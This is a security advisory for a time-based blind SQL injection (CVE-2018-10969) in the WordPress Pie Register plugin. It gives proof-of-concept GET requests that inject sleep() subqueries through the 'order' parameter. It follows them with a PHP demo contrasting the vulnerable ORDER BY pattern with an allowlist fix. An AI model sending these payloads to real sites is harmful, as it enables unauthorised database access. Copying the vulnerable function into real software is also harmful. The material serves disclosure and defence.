# Title: WordPress Plugin Pie Register < 3.0.9 - Blind SQL Injection
# Author: Manuel García Cárdenas
# Date: 2018-05-10
# Software: WordPress Plugin Pie Register 3.0.9
# CVE: CVE-2018-10969
#
# I. VULNERABILITY
#
# WordPress Plugin Pie Register 3.0.9 - Blind SQL Injection
#
# II. BACKGROUND
#
# Pie-Register is a quick and easy way to brand your Registration Pages on
# WordPress sites.
#
# III. DESCRIPTION
#
# This bug was found using the portal in the files:
#
# /pie-register/classes/invitation_code_pagination.php: if ( isset( $_GET['order'] ) && $_GET['order'] )
# /pie-register/classes/invitation_code_pagination.php: $order = $_GET['order'];
#
# When the query is executed, the "order" parameter is not sanitized:
#
# /pie-register/classes/invitation_code_pagination.php: $this->order = esc_sql( $order );
#
# IV. PROOF OF CONCEPT
#
# The following URLs have been confirmed to suffer from time-based SQL injection.

GET /wordpress/wp-admin/admin.php?page=pie-invitation-codes&orderby=name&order=desc (original)

GET /wordpress/wp-admin/admin.php?page=pie-invitation-codes&orderby=name&order=desc%2c(select*from(select(sleep(2)))a) HTTP/1.1 (2 seconds of response)

GET /wordpress/wp-admin/admin.php?page=pie-invitation-codes&orderby=name&order=desc%2c(select*from(select(sleep(30)))a) HTTP/1.1 (30 seconds of response)

#
# V. SYSTEMS AFFECTED
#
# Pie Register <= 3.0.9
#
# VI. DISCLOSURE TIMELINE
#
# May 10, 2018 1: Vulnerability acquired by Manuel Garcia Cardenas
# May 10, 2018 2: Send to vendor without response
# June 05, 2018 3: Second email to vendor without response
# June 11, 2018 4: Send to the Full-Disclosure lists
#
# VII. Solution
#
# Disable plugin until a fix is available
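The root cause in section III is a common one: WordPress' esc_sql() only backslash-escapes quote characters so that a value is safe inside a quoted string literal. An ORDER BY clause never quotes its operands, so a value such as desc,(select ...) contains nothing to escape and is spliced into the statement verbatim. The following is an added, self-contained example (not the plugin's code, and not from the advisory author) that reproduces the vulnerable pattern beside the allowlist fix a maintainer would apply; the table name wp_example_codes and the column names are hypothetical, and esc_sql() is emulated with addslashes() so the file runs from the php CLI without WordPress.

```php
<?php
// Added example, not code from the Pie Register plugin.
// Shows why escaping for string literals does not protect an ORDER BY clause,
// and the allowlist pattern that does.

// Stand-in for WordPress esc_sql(): it escapes quotes/backslashes for use
// inside a quoted string literal and nothing else (assumption for this demo).
function esc_sql_like(string $value): string
{
    return addslashes($value);
}

// Vulnerable pattern: the user-controlled sort column and direction are only
// string-escaped before being concatenated into ORDER BY, which is unquoted.
function build_query_vulnerable(string $orderby, string $order): string
{
    $orderby = esc_sql_like($orderby);
    $order   = esc_sql_like($order);
    // Hypothetical table name; not taken from the plugin.
    return "SELECT * FROM wp_example_codes ORDER BY $orderby $order";
}

// Hardened pattern: identifier and direction are mapped onto fixed allowlists,
// so no attacker-controlled bytes reach the SQL text at all.
const ALLOWED_ORDERBY = ['name', 'code', 'created']; // hypothetical columns
const ALLOWED_ORDER   = ['ASC', 'DESC'];

function sanitize_orderby(string $orderby): string
{
    return in_array($orderby, ALLOWED_ORDERBY, true) ? $orderby : 'name';
}

function sanitize_order(string $order): string
{
    $order = strtoupper($order);
    return in_array($order, ALLOWED_ORDER, true) ? $order : 'ASC';
}

function build_query_hardened(string $orderby, string $order): string
{
    $orderby = sanitize_orderby($orderby);
    $order   = sanitize_order($order);
    return "SELECT * FROM wp_example_codes ORDER BY `$orderby` $order";
}

// Constructed input with the same shape as the advisory's proof of concept:
// no quote characters, so the string-escaping stand-in leaves it untouched.
$orderby = 'name';
$order   = 'desc,(select*from(select(sleep(2)))a)';

echo "vulnerable: " . build_query_vulnerable($orderby, $order) . PHP_EOL;
// -> ... ORDER BY name desc,(select*from(select(sleep(2)))a)   (subquery runs)

echo "hardened:   " . build_query_hardened($orderby, $order) . PHP_EOL;
// -> ... ORDER BY `name` ASC   (unrecognised direction falls back to ASC)
```

In a real plugin the hardened string would then be handed to $wpdb->get_results(); $wpdb->prepare() cannot help here because its placeholders only cover values, not identifiers or keywords, which is exactly why an allowlist rather than escaping is the correct control for sort parameters. For detection while the plugin is still deployed, the same property gives a simple review check: any admin.php request whose order or orderby parameter contains characters outside [A-Za-z0-9_] is not a value the legitimate UI would ever send.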